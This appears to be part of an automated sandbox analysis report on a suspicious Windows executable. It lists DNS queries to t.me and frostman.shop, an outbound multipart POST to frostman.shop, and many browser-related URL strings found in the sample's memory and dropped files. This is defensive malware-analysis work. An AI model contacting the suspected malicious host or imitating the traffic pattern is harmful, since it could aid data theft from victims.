                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734680546567&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=796ea4f60b9c41758e1e1163076781a5&activityId=796ea4f60b9c41758e1e1163076781a5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DFA719B7D8764A69A65627E5921512AA&MUID=2FB26BEE4D14683625707EB54C6669DF HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; SM=T
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: t.me
                  Source: global trafficDNS traffic detected: DNS query: frostman.shop
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4OHD2VS26F3EUA1V3790User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, YM7G4E.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp.16.dr, 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drString found in binary or memory: https://assets.msn.com
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://bard.google.com/
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: Reporting and NEL.16.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: 2cc80dabc69f58b6_1.15.drString found in binary or memory: https://c.msn.com/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, YM7G4E.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: offscreendocument_main.js.15.dr, service_worker_bin_prod.js.15.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: manifest.json.15.drString found in binary or memory: https://chrome.google.com/webstore/
                  Source: manifest.json.15.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: 484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp.16.dr, 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drString found in binary or memory: https://clients2.google.com
                  Source: manifest.json0.15.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: 484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp.16.dr, 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drString found in binary or memory: https://clients2.googleusercontent.com
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: Reporting and NEL.16.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: manifest.json0.15.drString found in binary or memory: https://docs.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive-staging.corp.google.com/
                  Source: manifest.json0.15.drString found in binary or memory: https://drive.google.com/
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 000003.log9.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log9.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log10.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                  Source: 000003.log9.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: HubApps Icons.15.dr, d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                  Source: d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
